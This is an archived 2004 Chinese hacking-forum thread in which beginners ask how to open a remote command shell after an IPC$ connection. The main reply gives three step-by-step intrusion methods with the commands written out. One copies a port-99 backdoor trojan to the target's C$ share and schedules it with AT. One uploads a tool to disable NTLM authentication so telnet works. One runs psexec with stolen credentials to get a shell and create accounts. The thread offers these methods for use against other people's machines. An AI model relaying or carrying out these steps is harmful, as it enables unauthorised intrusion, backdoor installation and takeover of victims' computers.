|
 | 作者: qqwwee [qqwwee]
 论坛用户 |
登录 |
| 同上 |
| 地主 发表时间: 04-09-10 18:30 |
| 回复: qqwwee [qqwwee] 论坛用户 |
登录 |
|
没人说么 |
| B1层 发表时间: 04-09-10 21:51 |
 | 回复: wish [wish259]  论坛用户 |
登录 |
|
下面几种方法看完吧,如果你觉得一种方法都学不会,就劝你不要再幻想进步了! 利用用户建立了IPC连接,成功的话并不能直接在你的电脑上建立超级用户, 因为NET USER /ADD必须是在本地运行的, 也就是说,你必须想办法TELNET,或者用其他方法跳进对方的CMD里才能建立用 户.如何能利用用户打开对方的CMD呢? 前提:你已经拥有了用户和密码. 方法一 因为前面已经成功建立了IPC连接,所以我 们就可以复制命令把木马传送过去,例如上传SRV.EXE,COPY SRV.EXE \\IP\C$ ,然后用NET TIME \\IP查看对方的时间,再用类似AT \\IP SRV.EXE 06:10的命令 来运行SRV.EXE,不要告诉我SRV是开99端口的木马都不知道?!如果顺利SRV没被 杀毒软件KILL了的话,就可以在运行或着CMD里输入TELNET IP 99来登陆对方 CMD了.然后就可以在对方CMD里建立用户了,跟本地DOS操作一样`` 方法二 利用NETSVC.EXE这个工具来打开对方的TELNET服务, 但是即使打开了TELNET,也要通过对方NTLM验证,还要把对方NTLM验证关掉, 常用的方法就是,上传流光里的NTLM.EXE,再用AT运行,就可以直接TELNET IP 而不用验证了.再者,也可以在本地建立一个与你用来进行IPC连接的密码和用户名 相同的用户,然后再重新启动用这个用户本地登陆,就可以直接TELNET了 方法三 这方法是最简单最容易而最有效的方法,如果你有耐性看到这里,就说明我的努力 没有白费了.之所以不把这种方法写在前面,是因为想菜鸟们能够多尝试其他的方 法,明白"通往电脑的路不止一条!"的道理. 先在网上下载一套叫PSTOOLS的工具包,PSTOOLS是一套用于winnt\win2000 的系统管理工具,打开压包后里面共有十二个命令,功能非常强大.这里我们要用 到的就是PSEXEC.EXE,具体功能就不说了,自己去看说明吧,使用格式如下 psexec.exe \\ip -u 用户名 -p 密码 cmd.exe 这样就能直接打开对方CMD了,而且不用NTLM验证. 下面是PSTOOLS的下载地址, http://download.pchome.net/system/sysenhance/16488.html 因为SRV.EXE和NTLM.EXE被很多杀毒软件认定为病毒了,多半会被杀掉.所以成功 率不高.对比下第三种方法是最实在的,相信也是看完本文后大家用的最多的方法, 希望你能接受吧.也建议大家试试前面的两种方法,如果你有去尝试,你一定会 有收获的. 以上方法都是在网上跟前辈学来的,也算是自己一些小小的经验.但愿看完本文能 让你对打开对方CMD提升权限的认识有所提升吧 |
| B2层 发表时间: 04-09-10 22:34 |
 | 回复: TSnew [tsnew]  论坛用户 |
登录 |
|
请看基础学!ipc是一种通道协议,只能建立,不是拿不拿到的问题 |
| B3层 发表时间: 04-09-11 13:52 |
 | 回复: hackerjune [hackerjune]  论坛用户 |
登录 |
|
连到了就会自动转到对方的CMD 注意,这时不是自己的CMD,是对方的哦`` |
| B4层 发表时间: 04-09-11 14:13 |
 | 回复: paenz [paenz] 论坛用户 |
登录 |
|
to:wish 你上面的最后一个办法介绍的软件说是WINNT/WIN2000系统的,我是XP的用户可以用吗?还有是对方也一定要WINNT/WIN2000的用户吗? |
| B5层 发表时间: 04-09-11 14:56 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 如果拿连接到IPC..那怎样打开他的CMD?